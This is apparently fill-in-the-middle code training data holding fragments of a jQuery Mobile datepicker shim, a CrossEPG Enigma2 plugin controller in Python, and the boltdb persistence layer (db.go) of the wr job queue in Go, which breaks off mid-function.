ui-btn-icon-notext").end() .find(".ui-icon.ui-icon-circle-triangle-e, .ui-icon.ui-icon-circle-triangle-w").replaceWith(function() { return this.childNodes; }).end() .find("span.ui-state-default").removeClass("ui-state-default").addClass("ui-btn").end() .find("a.ui-state-default.ui-state-active").removeClass("ui-state-default ui-state-highlight ui-priority-secondary ui-state-active").addClass("ui-btn ui-btn-active").end() .find("a.ui-state-default").removeClass("ui-state-default ui-state-highlight ui-priority-secondary").addClass("ui-btn").end() .find(".ui-datepicker-buttonpane").removeClass("ui-widget-content").end() .find(".ui-datepicker-current").removeClass("ui-state-default ui-priority-secondary").addClass("ui-btn ui-btn-inline ui-mini").end() .find(".ui-datepicker-close").removeClass("ui-state-default ui-priority-primary").addClass("ui-btn ui-btn-inline ui-mini").end() .html(); }; // replace jQuery UI CSS classes with jQuery Mobile CSS classes on the datepicker div, unbind mouseover and mouseout events on the datepicker div $.datepicker._newInst_old = $.datepicker._newInst; $.datepicker._newInst = function(target, inline) { var inst = this._newInst_old(target, inline); if (inst.dpDiv.hasClass("ui-widget")) { inst.dpDiv.removeClass("ui-widget ui-widget-content ui-helper-clearfix").addClass(inline ? "ui-content" : "ui-content ui-overlay-shadow ui-body-a").unbind("mouseover mouseout"); } return inst; }; })();<|fim▁end|>
var tabIndex = $.attr( element, "tabindex" ), isTabIndexNaN = isNaN( tabIndex ); return ( isTabIndexNaN || tabIndex >= 0 ) && focusable( element, !isTabIndexNaN );
<|file_name|>crossepg_main.py<|end_file_name|><|fim▁begin|>from __future__ import print_function from __future__ import absolute_import from enigma import * from Screens.MessageBox import MessageBox from Screens.Standby import TryQuitMainloop from . crossepglib import * from . crossepg_downloader import CrossEPG_Downloader from . crossepg_importer import CrossEPG_Importer from . crossepg_converter import CrossEPG_Converter from . crossepg_loader import CrossEPG_Loader from . crossepg_setup import CrossEPG_Setup from . crossepg_menu import CrossEPG_Menu from . crossepg_auto import CrossEPG_Auto class CrossEPG_Main: def __init__(self): self.config = CrossEPG_Config() self.patchtype = getEPGPatchType() def downloader(self, session): self.session = session CrossEPG_Auto.instance.lock = True CrossEPG_Auto.instance.stop() self.config.load() if self.config.configured == 0: self.session.openWithCallback(self.configureCallback, MessageBox, _("You need to configure crossepg before starting downloader.\nWould You like to do it now ?"), type=MessageBox.TYPE_YESNO) else: self.config.deleteLog() self.session.openWithCallback(self.downloadCallback, CrossEPG_Downloader, self.config.providers) def configureCallback(self, result): if result is True: self.session.open(CrossEPG_Setup) def loaderAsPlugin(self, session): self.session = session CrossEPG_Auto.instance.lock = True CrossEPG_Auto.instance.stop() self.loader() def downloadCallback(self, ret): if ret: if self.config.csv_import_enabled == 1: self.importer() else: if self.patchtype != 3: self.converter() else: self.loader() else: CrossEPG_Auto.instance.lock = False def importer(self): self.session.openWithCallback(self.importerCallback, CrossEPG_Importer) def importerCallback(self, ret): if ret: if self.patchtype != 3: self.converter() else: self.loader() else: CrossEPG_Auto.instance.lock = False def converter(self): self.session.openWithCallback(self.converterCallback, CrossEPG_Converter) def converterCallback(self, ret): if ret: if self.patchtype != -1: self.loader() else: if self.config.download_manual_reboot: self.session.open(TryQuitMainloop, 3) else: CrossEPG_Auto.instance.lock = False else: CrossEPG_Auto.instance.lock = False def loader(self): self.session.openWithCallback(self.loaderCallback, CrossEPG_Loader) def loaderCallback(self, ret): CrossEPG_Auto.instance.lock = False def setup(self, session, **kwargs):<|fim▁hole|> def setupCallback(self): CrossEPG_Auto.instance.lock = False CrossEPG_Auto.instance.doneConfiguring() crossepg_main = CrossEPG_Main()<|fim▁end|>
CrossEPG_Auto.instance.lock = True session.openWithCallback(self.setupCallback, CrossEPG_Menu)
<|file_name|>db.go<|end_file_name|><|fim▁begin|>// Copyright © 2016-2021 Genome Research Limited // Author: Sendu Bala <[email protected]>. // // This file is part of wr. // // wr is free software: you can redistribute it and/or modify // it under the terms of the GNU Lesser General Public License as published by // the Free Software Foundation, either version 3 of the License, or // (at your option) any later version. // // wr is distributed in the hope that it will be useful, // but WITHOUT ANY WARRANTY; without even the implied warranty of // MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the // GNU Lesser General Public License for more details. // // You should have received a copy of the GNU Lesser General Public License // along with wr. If not, see <http://www.gnu.org/licenses/>. package jobqueue // This file contains functions for interacting with our database, which is // boltdb, a simple key/val store with transactions and hot backup ability. // We don't use a generic ORM for boltdb like Storm, because we can do custom // queries that are multiple times faster than what Storm can do. import ( "bytes" "context" "encoding/binary" "fmt" "io" "math" "os" "path/filepath" "sort" "strconv" "strings" "time" sync "github.com/sasha-s/go-deadlock" "github.com/wtsi-ssg/wr/clog" "github.com/VertebrateResequencing/muxfys/v4" "github.com/VertebrateResequencing/wr/internal" lru "github.com/hashicorp/golang-lru" "github.com/sb10/waitgroup" "github.com/ugorji/go/codec" bolt "go.etcd.io/bbolt" ) const ( dbDelimiter = "_::_" jobStatWindowPercent = float32(5) dbFilePermission = 0600 minimumTimeBetweenBackups = 30 * time.Second dbRunningTransactionsWaitTime = 1 * time.Minute ) var ( bucketJobsLive = []byte("jobslive") bucketJobsComplete = []byte("jobscomplete") bucketRTK = []byte("repgroupToKey") bucketRGs = []byte("repgroups") bucketLGs = []byte("limitgroups") bucketDTK = []byte("depgroupToKey") bucketRDTK = []byte("reverseDepgroupToKey") bucketEnvs = []byte("envs") bucketStdO = []byte("stdo") bucketStdE = []byte("stde") bucketJobRAM = []byte("jobRAM") bucketJobDisk = []byte("jobDisk") bucketJobSecs = []byte("jobSecs") wipeDevDBOnInit = true forceBackups = false ) // Rec* variables are only exported for testing purposes (*** though they should // probably be user configurable somewhere...). var ( RecMBRound = 100 // when we recommend amount of memory to reserve for a job, we round up to the nearest RecMBRound MBs RecSecRound = 1 // when we recommend time to reserve for a job, we round up to the nearest RecSecRound seconds ) // sobsd ('slice of byte slice doublets') implements sort interface so we can // sort a slice of []byte doublets, sorting on the first byte slice, needed for // efficient Puts in to the database. type sobsd [][2][]byte func (s sobsd) Len() int { return len(s) } func (s sobsd) Swap(i, j int) { s[i], s[j] = s[j], s[i] } func (s sobsd) Less(i, j int) bool { cmp := bytes.Compare(s[i][0], s[j][0]) return cmp == -1 } // sobsdStorer is the kind of function that stores the contents of a sobsd in // a particular bucket type sobsdStorer func(bucket []byte, encodes sobsd) (err error) type db struct { backupLast time.Time backupPath string backupPathTmp string ch codec.Handle backupStopWait chan bool backupMount *muxfys.MuxFys backupNotification chan bool backupWait time.Duration bolt *bolt.DB envcache *lru.ARCCache updatingAfterJobExit int wg *waitgroup.WaitGroup wgMutex sync.Mutex // protects wg since we want to call Wait() while another goroutine might call Add() sync.RWMutex backingUp bool backupFinal bool backupQueued bool backupsEnabled bool s3accessor *muxfys.S3Accessor closed bool slowBackups bool // just for testing purposes } // initDB opens/creates our database and sets things up for use. If dbFile // doesn't exist or seems corrupted, we copy it from backup if that exists, // otherwise we start fresh. // // dbBkFile can be an S3 url specified like: s3://[profile@]bucket/path/file // which will cause that s3 path to be mounted in the same directory as dbFile // and backups will be written there. // // In development we delete any existing db and force a fresh start. Backups // are also not carried out, so dbBkFile is ignored. func initDB(ctx context.Context, dbFile string, dbBkFile string, deployment string) (*db, string, error) { var backupsEnabled bool var accessor *muxfys.S3Accessor backupPathTmp := dbBkFile + ".tmp" var msg string if deployment == internal.Production || forceBackups { backupsEnabled = true if internal.InS3(dbBkFile) { if deployment == internal.Development { dbBkFile += "." + deployment } path := strings.TrimPrefix(dbBkFile, internal.S3Prefix) pp := strings.Split(path, "@") profile := "default" if len(pp) == 2 { profile = pp[0] path = pp[1] } path = filepath.Dir(path) accessorConfig, err := muxfys.S3ConfigFromEnvironment(profile, path) if err != nil { return nil, "", err } accessor, err = muxfys.NewS3Accessor(accessorConfig) if err != nil { return nil, "", err } dbBkFile = filepath.Join(path, filepath.Base(dbBkFile)) dbBkFile, err = stripBucketFromS3Path(dbBkFile) if err != nil { return nil, "", err } backupPathTmp = dbFile + ".s3backup_tmp" if _, err = os.Stat(dbFile); os.IsNotExist(err) { err = accessor.DownloadFile(dbBkFile, dbFile) if err == nil { msg = "recreated missing db file " + dbFile + " from s3 backup file " + dbBkFile } } } } if wipeDevDBOnInit && deployment == internal.Development { errr := os.Remove(dbFile) if errr != nil && !os.IsNotExist(errr) { clog.Warn(ctx, "Failed to remove database file", "path", dbFile, "err", errr) } if accessor != nil { errr = accessor.DeleteFile(dbBkFile) } else { errr = os.Remove(dbBkFile) } if errr != nil && !os.IsNotExist(errr) { clog.Warn(ctx, "Failed to remove database backup file", "path", dbBkFile, "err", errr) } } var boltdb *bolt.DB var err error if _, err = os.Stat(dbFile); os.IsNotExist(err) { if _, err = os.Stat(dbBkFile); os.IsNotExist(err) { boltdb, err = bolt.Open(dbFile, dbFilePermission, nil) msg = "created new empty db file " + dbFile } else { err = copyFile(dbBkFile, dbFile) if err != nil { return nil, msg, err } boltdb, err = bolt.Open(dbFile, dbFilePermission, nil) msg = "recreated missing db file " + dbFile + " from backup file " + dbBkFile } } else { boltdb, err = bolt.Open(dbFile, dbFilePermission, nil) if err != nil { // try the backup bkPath := dbBkFile if accessor != nil { bkPath = backupPathTmp errdl := accessor.DownloadFile(dbBkFile, bkPath) if errdl != nil { msg = fmt.Sprintf("tried to recreate corrupt (?) db file %s "+ "from s3 backup file %s (error with original db file was: %s)", dbFile, dbBkFile, err) return nil, msg, errdl } defer func() { errr := os.Remove(bkPath) if errr != nil { clog.Warn(ctx, "failed to remove temporary s3 download of database backup", "err", errr) } }() } if _, errbk := os.Stat(bkPath); errbk == nil { boltdb, errbk = bolt.Open(bkPath, dbFilePermission, nil) if errbk == nil { origerr := err msg = fmt.Sprintf("tried to recreate corrupt (?) db file %s from backup file %s (error with original db file was: %s)", dbFile, dbBkFile, err) err = os.Remove(dbFile) if err != nil { return nil, msg, err } err = copyFile(bkPath, dbFile) if err != nil { return nil, msg, err } boltdb, err = bolt.Open(dbFile, dbFilePermission, nil) msg = fmt.Sprintf("recreated corrupt (?) db file %s from backup file %s (error with original db file was: %s)", dbFile, dbBkFile, origerr) } } } } if err != nil { return nil, msg, err } // ensure our buckets are in place err = boltdb.Update(func(tx *bolt.Tx) error { _, errf := tx.CreateBucketIfNotExists(bucketJobsLive) if errf != nil { return fmt.Errorf("create bucket %s: %s", bucketJobsLive, errf) } _, errf = tx.CreateBucketIfNotExists(bucketJobsComplete) if errf != nil { return fmt.Errorf("create bucket %s: %s", bucketJobsComplete, errf) } _, errf = tx.CreateBucketIfNotExists(bucketRTK) if errf != nil { return fmt.Errorf("create bucket %s: %s", bucketRTK, errf) } _, errf = tx.CreateBucketIfNotExists(bucketRGs) if errf != nil { return fmt.Errorf("create bucket %s: %s", bucketRGs, errf) } _, errf = tx.CreateBucketIfNotExists(bucketLGs) if errf != nil { return fmt.Errorf("create bucket %s: %s", bucketLGs, errf) } _, errf = tx.CreateBucketIfNotExists(bucketDTK) if errf != nil { return fmt.Errorf("create bucket %s: %s", bucketDTK, errf) } _, errf = tx.CreateBucketIfNotExists(bucketRDTK) if errf != nil { return fmt.Errorf("create bucket %s: %s", bucketRDTK, errf) } _, errf = tx.CreateBucketIfNotExists(bucketEnvs) if errf != nil { return fmt.Errorf("create bucket %s: %s", bucketEnvs, errf) } _, errf = tx.CreateBucketIfNotExists(bucketStdO) if errf != nil { return fmt.Errorf("create bucket %s: %s", bucketStdO, errf) } _, errf = tx.CreateBucketIfNotExists(bucketStdE) if errf != nil { return fmt.Errorf("create bucket %s: %s", bucketStdE, errf) } _, errf = tx.CreateBucketIfNotExists(bucketJobRAM) if errf != nil { return fmt.Errorf("create bucket %s: %s", bucketJobRAM, errf) } _, errf = tx.CreateBucketIfNotExists(bucketJobDisk) if errf != nil { return fmt.Errorf("create bucket %s: %s", bucketJobDisk, errf) } _, errf = tx.CreateBucketIfNotExists(bucketJobSecs) if errf != nil { return fmt.Errorf("create bucket %s: %s", bucketJobSecs, errf) } return nil }) if err != nil { return nil, msg, err } // we will cache frequently used things to avoid actual db (disk) access envcache, err := lru.NewARC(12) // we don't expect that many different ENVs to be in use at once if err != nil { return nil, msg, err } dbstruct := &db{ bolt: boltdb, envcache: envcache, ch: new(codec.BincHandle), backupsEnabled: backupsEnabled, backupPath: dbBkFile, backupPathTmp: backupPathTmp, backupNotification: make(chan bool), backupWait: minimumTimeBetweenBackups, backupStopWait: make(chan bool), s3accessor: accessor, wg: waitgroup.New(), } return dbstruct, msg, err } // storeLimitGroups stores a mapping of group names to unsigned ints in a // dedicated bucket. If a group was already in the database, and it had a // different value, that group name will be returned in the changed slice. If // the group is given with a value less than 0, it is not stored in the // database; any existing entry is removed and the name is returned in the // removed slice. func (db *db) storeLimitGroups(limitGroups map[string]int) (changed []string, removed []string, err error) { err = db.bolt.Batch(func(tx *bolt.Tx) error { b := tx.Bucket(bucketLGs) for group, limit := range limitGroups { key := []byte(group) v := b.Get(key) if v != nil { if limit < 0 { errd := b.Delete(key) if errd != nil { return errd } removed = append(removed, group) continue } if binary.BigEndian.Uint64(v) == uint64(limit) { continue } changed = append(changed, group) } else if limit < 0 { continue } v = make([]byte, 8) binary.BigEndian.PutUint64(v, uint64(limit)) errp := b.Put(key, v) if errp != nil { return errp } } return nil }) return changed, removed, err } // retrieveLimitGroup gets a value for a particular group from the db that was // stored with storeLimitGroups(). If the group wasn't stored, returns -1. func (db *db) retrieveLimitGroup(ctx context.Context, group string) int { v := db.retrieve(ctx, bucketLGs, group) if v == nil { return -1 } return int(binary.BigEndian.Uint64(v)) } // storeNewJobs stores jobs in the live bucket, where they will only be used for // disaster recovery. It also stores a lookup from the Job.RepGroup to the Job's // key, and since this is independent, and we call this prior to checking for // dups, we allow the same job to be looked up by multiple RepGroups. Likewise, // we store a lookup for the Job.DepGroups and .Dependencies.DepGroups(). // // If ignoreAdded is true, jobs that have already completed will be ignored // along with those that have been added and the returned alreadyAdded value // will increase. // // While storing it also checks if any previously stored jobs depend on a dep // group that an input job is a member of. If not, jobsToQueue return value will // be identical to the input job slice (minus any jobs ignored due to being // complete). Otherwise, if the affected job was Archive()d (and not currently // being re-run), then it will be appended to (a copy of) the input job slice // and returned in jobsToQueue. If the affected job was in the live bucket // (currently queued), it will be returned in the jobsToUpdate slice: you should // use queue methods to update the job in the queue. // // Finally, it triggers a background database backup. func (db *db) storeNewJobs(ctx context.Context, jobs []*Job, ignoreAdded bool) (jobsToQueue []*Job, jobsToUpdate []*Job, alreadyAdded int, err error) { encodedJobs, rgLookups, dgLookups, rdgLookups, rgs, jobsToQueue, jobsToUpdate, alreadyAdded, err := db.prepareNewJobs(jobs, ignoreAdded) if err != nil { return jobsToQueue, jobsToUpdate, alreadyAdded, err } if len(encodedJobs) > 0 { // now go ahead and store the lookups and jobs numStores := 2 if len(rgs) > 0 { numStores++ } if len(dgLookups) > 0 { numStores++ } if len(rdgLookups) > 0 { numStores++ } errors := make(chan error, numStores) db.wgMutex.Lock() wgk := db.wg.Add(1) go func() { defer internal.LogPanic(ctx, "jobqueue database storeNewJobs rglookups", true) defer db.wg.Done(wgk) sort.Sort(rgLookups) errors <- db.storeBatched(bucketRTK, rgLookups, db.storeLookups) }() if len(rgs) > 0 { wgk2 := db.wg.Add(1) go func() { defer internal.LogPanic(ctx, "jobqueue database storeNewJobs repGroups", true) defer db.wg.Done(wgk2) sort.Sort(rgs) errors <- db.storeBatched(bucketRGs, rgs, db.storeLookups) }() } if len(dgLookups) > 0 { wgk3 := db.wg.Add(1) go func() { defer internal.LogPanic(ctx, "jobqueue database dgLookups", true) defer db.wg.Done(wgk3) sort.Sort(dgLookups) errors <- db.storeBatched(bucketDTK, dgLookups, db.storeLookups) }() } if len(rdgLookups) > 0 { wgk4 := db.wg.Add(1) go func() { defer internal.LogPanic(ctx, "jobqueue database storeNewJobs rdgLookups", true) defer db.wg.Done(wgk4) sort.Sort(rdgLookups) errors <- db.storeBatched(bucketRDTK, rdgLookups, db.storeLookups) }() } wgk5 := db.wg.Add(1) go func() { defer internal.LogPanic(ctx, "jobqueue database storeNewJobs encodedJobs", true) defer db.wg.Done(wgk5) sort.Sort(encodedJobs) errors <- db.storeBatched(bucketJobsLive, encodedJobs, db.storeEncodedJobs) }() db.wgMutex.Unlock() seen := 0 for thisErr := range errors { if thisErr != nil { err = thisErr } seen++ if seen == numStores { close(errors) break } } } // *** on error, because we were batching, and doing lookups separately to // each other and jobs, we should go through and remove anything we did // manage to add... (but this isn't so critical, since on failure here, // they are not added to the in-memory queue and user gets an error and they // would try to add everything back again; conversely, if we try to retrieve // non-existent jobs based on lookups that shouldn't be there, they are // silently skipped) if err == nil && alreadyAdded != len(jobs) { db.backgroundBackup(ctx) } return jobsToQueue, jobsToUpdate, alreadyAdded, err } func (db *db) prepareNewJobs(jobs []*Job, ignoreAdded bool) (encodedJobs, rgLookups, dgLookups, rdgLookups, rgs sobsd, jobsToQueue []*Job, jobsToUpdate []*Job, alreadyAdded int, err error) { // turn the jobs in to sobsd and sort by their keys, likewise for the // lookups repGroups := make(map[string]bool) depGroups := make(map[string]bool) newJobKeys := make(map[string]bool) var keptJobs []*Job for _, job := range jobs { keyStr := job.Key() if ignoreAdded { var added bool added, err = db.checkIfAdded(keyStr) if err != nil { return encodedJobs, rgLookups, dgLookups, rdgLookups, rgs, jobsToQueue, jobsToUpdate, alreadyAdded, err } if added { alreadyAdded++ continue } keptJobs = append(keptJobs, job) } newJobKeys[keyStr] = true key := []byte(keyStr) job.RLock() rgLookups = append(rgLookups, [2][]byte{db.generateLookupKey(job.RepGroup, key), nil}) repGroups[job.RepGroup] = true for _, depGroup := range job.DepGroups { if depGroup != "" { dgLookups = append(dgLookups, [2][]byte{db.generateLookupKey(depGroup, key), nil}) depGroups[depGroup] = true } } for _, depGroup := range job.Dependencies.DepGroups() { rdgLookups = append(rdgLookups, [2][]byte{db.generateLookupKey(depGroup, key), nil}) } job.RUnlock() var encoded []byte enc := codec.NewEncoderBytes(&encoded, db.ch) job.RLock() err = enc.Encode(job) job.RUnlock() if err != nil { return encodedJobs, rgLookups, dgLookups, rdgLookups, rgs, jobsToQueue, jobsToUpdate, alreadyAdded, err } encodedJobs = append(encodedJobs, [2][]byte{key, encoded}) } if len(encodedJobs) > 0 { if !ignoreAdded { keptJobs = jobs } // first determine if any of these new jobs are the parent of previously // stored jobs if len(depGroups) > 0 { jobsToQueue, jobsToUpdate, err = db.retrieveDependentJobs(depGroups, newJobKeys) // arrange to have resurrected complete jobs stored in the live // bucket again for _, job := range jobsToQueue { key := []byte(job.Key()) var encoded []byte enc := codec.NewEncoderBytes(&encoded, db.ch) job.RLock() err = enc.Encode(job) job.RUnlock() if err != nil { return encodedJobs, rgLookups, dgLookups, rdgLookups, rgs, jobsToQueue, jobsToUpdate, alreadyAdded, err } encodedJobs = append(encodedJobs, [2][]byte{key, encoded}) } if len(jobsToQueue) > 0 { jobsToQueue = append(jobsToQueue, jobs...) } else { jobsToQueue = keptJobs } } else { jobsToQueue = keptJobs } for rg := range repGroups { rgs = append(rgs, [2][]byte{[]byte(rg), nil}) } } return encodedJobs, rgLookups, dgLookups, rdgLookups, rgs, jobsToQueue, jobsToUpdate, alreadyAdded, err } // generateLookupKey creates a lookup key understood by the retrieval methods, // concatenating prefix with a delimiter and the job key. func (db *db) generateLookupKey(prefix string, jobKey []byte) []byte { key := append([]byte(prefix), []byte(dbDelimiter)...) return append(key, jobKey...) } // checkIfLive tells you if a job with the given key is currently in the live // bucket. func (db *db) checkIfLive(key string) (bool, error) { var isLive bool err := db.bolt.View(func(tx *bolt.Tx) error { newJobBucket := tx.Bucket(bucketJobsLive) if newJobBucket.Get([]byte(key)) != nil { isLive = true } return nil }) return isLive, err } // checkIfAdded tells you if a job with the given key is currently in the // complete bucket or the live bucket. func (db *db) checkIfAdded(key string) (bool, error) { var isInDB bool err := db.bolt.View(func(tx *bolt.Tx) error { newJobBucket := tx.Bucket(bucketJobsLive) completeJobBucket := tx.Bucket(bucketJobsComplete) if newJobBucket.Get([]byte(key)) != nil || completeJobBucket.Get([]byte(key)) != nil { isInDB = true } return nil }) return isInDB, err } // archiveJob deletes a job from the live bucket, and adds a new version of it // (with different properties) to the complete bucket. // // Also does what updateJobAfterExit does, except for the storage of any new // stdout/err. // // The key you supply must be the key of the job you supply, or bad things will // happen - no checking is done! A backgroundBackup() is triggered afterwards. func (db *db) archiveJob(ctx context.Context, key string, job *Job) error { var encoded []byte enc := codec.NewEncoderBytes(&encoded, db.ch) job.RLock() err := enc.Encode(job) job.RUnlock() if err != nil { return err } err = db.bolt.Batch(func(tx *bolt.Tx) error { bo := tx.Bucket(bucketStdO) be := tx.Bucket(bucketStdE) key := []byte(key) errf := bo.Delete(key) if errf != nil { return errf } errf = be.Delete(key) if errf != nil { return errf } b := tx.Bucket(bucketJobsLive) errf = b.Delete(key) if errf != nil { return errf } b = tx.Bucket(bucketJobsComplete) errf = b.Put(key, encoded) if errf != nil { return errf } b = tx.Bucket(bucketJobRAM) errf = b.Put([]byte(fmt.Sprintf("%s%s%20d", job.ReqGroup, dbDelimiter, job.PeakRAM)), []byte(strconv.Itoa(job.PeakRAM))) if errf != nil { return errf } b = tx.Bucket(bucketJobDisk) errf = b.Put([]byte(fmt.Sprintf("%s%s%20d", job.ReqGroup, dbDelimiter, job.PeakDisk)), []byte(strconv.Itoa(int(job.PeakDisk)))) if errf != nil { return errf } b = tx.Bucket(bucketJobSecs) secs := int(math.Ceil(job.EndTime.Sub(job.StartTime).Seconds())) return b.Put([]byte(fmt.Sprintf("%s%s%20d", job.ReqGroup, dbDelimiter, secs)), []byte(strconv.Itoa(secs))) }) db.backgroundBackup(ctx) return err } // deleteLiveJob remove a job from the live bucket, for use when jobs were // added in error. func (db *db) deleteLiveJob(ctx context.Context, key string) { db.remove(ctx, bucketJobsLive, key) db.backgroundBackup(ctx) //*** we're not removing the lookup entries from the bucket*TK buckets... } // deleteLiveJobs remove multiple jobs from the live bucket. func (db *db) deleteLiveJobs(ctx context.Context, keys []string) error { err := db.bolt.Batch(func(tx *bolt.Tx) error { b := tx.Bucket(bucketJobsLive) for _, key := range keys { errd := b.Delete([]byte(key)) if errd != nil { return errd } } return nil }) if err != nil { return err } db.backgroundBackup(ctx) //*** we're not removing the lookup entries from the bucket*TK buckets... return nil } // recoverIncompleteJobs returns all jobs in the live bucket, for use when // restarting the server, allowing you start working on any jobs that were // stored with storeNewJobs() but not yet archived with archiveJob(). // // Note that you will get back the job as it was in its last recorded state. // The state is recorded when a job starts to run, when it exits, and when it // is kicked. func (db *db) recoverIncompleteJobs() ([]*Job, error) { var jobs []*Job err := db.bolt.View(func(tx *bolt.Tx) error { b := tx.Bucket(bucketJobsLive) return b.ForEach(func(key, encoded []byte) error { if encoded != nil { dec := codec.NewDecoderBytes(encoded, db.ch) job := &Job{} errf := dec.Decode(job) if errf != nil { return errf } jobs = append(jobs, job) } return nil }) }) return jobs, err } // retrieveCompleteJobsByKeys gets jobs with the given keys from the completed // jobs bucket (ie. those that have gone through the queue and been Remove()d). func (db *db) retrieveCompleteJobsByKeys(keys []string) ([]*Job, error) { var jobs []*Job err := db.bolt.View(func(tx *bolt.Tx) error { b := tx.Bucket(bucketJobsComplete) for _, key := range keys { encoded := b.Get([]byte(key)) if encoded != nil { dec := codec.NewDecoderBytes(encoded, db.ch) job := &Job{} err := dec.Decode(job) if err == nil { jobs = append(jobs, job) } } } return nil }) return jobs, err } // retrieveRepGroups gets the rep groups of all jobs that have ever been added. func (db *db) retrieveRepGroups() ([]string, error) { var rgs []string err := db.bolt.View(func(tx *bolt.Tx) error { b := tx.Bucket(bucketRGs) return b.ForEach(func(k, v []byte) error { rgs = append(rgs, string(k)) return nil }) }) return rgs, err } // retrieveCompleteJobsByRepGroup gets jobs with the given RepGroup from the // completed jobs bucket (ie. those that have gone through the queue and been // Archive()d), but not those that are also currently live (ie. are being // re-run). func (db *db) retrieveCompleteJobsByRepGroup(repgroup string) ([]*Job, error) { var jobs []*Job err := db.bolt.View(func(tx *bolt.Tx) error { newJobBucket := tx.Bucket(bucketJobsLive) completeJobBucket := tx.Bucket(bucketJobsComplete) lookupBucket := tx.Bucket(bucketRTK).Cursor() prefix := []byte(repgroup + dbDelimiter) for k, _ := lookupBucket.Seek(prefix); bytes.HasPrefix(k, prefix); k, _ = lookupBucket.Next() { key := bytes.TrimPrefix(k, prefix) encoded := completeJobBucket.Get(key) if len(encoded) > 0 && newJobBucket.Get(key) == nil { dec := codec.NewDecoderBytes(encoded, db.ch) job := &Job{} err := dec.Decode(job) if err != nil { return err } jobs = append(jobs, job) } } return nil }) return jobs, err } // retrieveDependentJobs gets previously stored jobs that had a dependency on // one for the input depGroups. If the job is found in the live bucket, then it // is returned in the jobsToUpdate return value. If it is found in the complete // bucket, and is not true in the supplied newJobKeys map, then it is returned // in the jobsToQueue return value. func (db *db) retrieveDependentJobs(depGroups map[string]bool, newJobKeys map[string]bool) (jobsToQueue []*Job, jobsToUpdate []*Job, err error) { // first convert the depGroups in to sorted prefixes, for linear searching prefixes := make(sobsd, 0, len(depGroups)) for depGroup := range depGroups { prefixes = append(prefixes, [2][]byte{[]byte(depGroup + dbDelimiter), nil}) } sort.Sort(prefixes) err = db.bolt.View(func(tx *bolt.Tx) error { newJobBucket := tx.Bucket(bucketJobsLive) completeJobBucket := tx.Bucket(bucketJobsComplete) lookupBucket := tx.Bucket(bucketRDTK).Cursor() doneKeys := make(map[string]bool) for { newDepGroups := make(map[string]bool) for _, bsd := range prefixes { for k, _ := lookupBucket.Seek(bsd[0]); bytes.HasPrefix(k, bsd[0]); k, _ = lookupBucket.Next() { key := bytes.TrimPrefix(k, bsd[0]) keyStr := string(key) if doneKeys[keyStr] { continue } encoded := newJobBucket.Get(key) live := false if len(encoded) > 0 { live = true } else if !newJobKeys[keyStr] { encoded = completeJobBucket.Get(key) } if len(encoded) > 0 { dec := codec.NewDecoderBytes(encoded, db.ch) job := &Job{} errf := dec.Decode(job) if errf != nil { return errf } // since we're going to add this job, we also need to // check its DepGroups and repeat this loop on any new // ones for _, depGroup := range job.DepGroups { if depGroup != "" && !depGroups[depGroup] { newDepGroups[depGroup] = true } } if live { jobsToUpdate = append(jobsToUpdate, job) } else { jobsToQueue = append(jobsToQueue, job) } } doneKeys[keyStr] = true } } if len(newDepGroups) > 0 { var newPrefixes sobsd for depGroup := range newDepGroups { newPrefixes = append(newPrefixes, [2][]byte{[]byte(depGroup + dbDelimiter), nil}) depGroups[depGroup] = true } sort.Sort(newPrefixes) prefixes = newPrefixes } else { break } } return nil }) return jobsToQueue, jobsToUpdate, err } // retrieveIncompleteJobKeysByDepGroup gets jobs with the given DepGroup from // the live bucket (ie. those that have been added to the queue and not yet // Archive()d - even if they've been added and archived in the past). func (db *db) retrieveIncompleteJobKeysByDepGroup(depgroup string) ([]string, error) { var jobKeys []string err := db.bolt.View(func(tx *bolt.Tx) error { newJobBucket := tx.Bucket(bucketJobsLive) lookupBucket := tx.Bucket(bucketDTK).Cursor() prefix := []byte(depgroup + dbDelimiter) for k, _ := lookupBucket.Seek(prefix); bytes.HasPrefix(k, prefix); k, _ = lookupBucket.Next() { key := bytes.TrimPrefix(k, prefix) if newJobBucket.Get(key) != nil { jobKeys = append(jobKeys, string(key)) } } return nil }) return jobKeys, err } // storeEnv stores a clientRequest.Env in db unless cached, which means it must // already be there. Returns a key by which the stored Env can be retrieved. func (db *db) storeEnv(env []byte) (string, error) { envkey := byteKey(env) if !db.envcache.Contains(envkey) { err := db.store(bucketEnvs, envkey, env) if err != nil { return envkey, err } db.envcache.Add(envkey, env) } return envkey, nil } // retrieveEnv gets a value from the db that was stored with storeEnv(). The<|fim▁hole|>func (db *db) retrieveEnv(ctx context.Context, envkey string) []byte { cached, got := db.envcache.Get(envkey) if got { return cached.([]byte) } envc := db.retrieve(ctx, bucketEnvs, envkey) db.envcache.Add(envkey, envc) return envc } // updateJobAfterExit stores the Job's peak RAM usage and wall time against the // Job's ReqGroup, but only if the job failed for using too much RAM or time, // allowing recommendedReqGroup*(ReqGroup) to work. // // So that state can be restored if the server crashes and is restarted, the // job is rewritten in its current state in to the live bucket. // // It also updates the stdout/err associated with a job. We don't want to store // these in the job, since that would waste a lot of the queue's memory; we // store in db instead, and only retrieve when a client needs to see these. To // stop the db file becoming enormous, we only store these if the cmd failed (or // if forceStorage is true: used when the job got buried) and also delete these // from db when the cmd completes successfully. // // By doing the deletion upfront, we also ensure we have the latest std, which // may be nil even on cmd failure. Since it is not critical to the running of // jobs and workflows that this works 100% of the time, we ignore errors and // write to bolt in a goroutine, giving us a significant speed boost. func (db *db) updateJobAfterExit(ctx context.Context, job *Job, stdo []byte, stde []byte, forceStorage bool) { var encoded []byte enc := codec.NewEncoderBytes(&encoded, db.ch) db.Lock() defer db.Unlock() if db.closed { return } jobkey := job.Key() job.RLock() secs := int(math.Ceil(job.EndTime.Sub(job.StartTime).Seconds())) jrg := job.ReqGroup jpr := job.PeakRAM jpd := job.PeakDisk jec := job.Exitcode jfr := job.FailReason err := enc.Encode(job) job.RUnlock() if err != nil { clog.Error(ctx, "Database operation updateJobAfterExit failed due to Encode failure", "err", err) return } db.updatingAfterJobExit++ db.wgMutex.Lock() defer db.wgMutex.Unlock() wgk := db.wg.Add(1) go func() { defer internal.LogPanic(ctx, "updateJobAfterExit", true) err := db.bolt.Batch(func(tx *bolt.Tx) error { key := []byte(jobkey) bjl := tx.Bucket(bucketJobsLive) if bjl.Get(key) != nil { errf := bjl.Put(key, encoded) if errf != nil { return errf } } bo := tx.Bucket(bucketStdO) be := tx.Bucket(bucketStdE) errf := bo.Delete(key) if errf != nil { return errf } errf = be.Delete(key) if errf != nil { return errf } if jec != 0 || forceStorage { if len(stdo) > 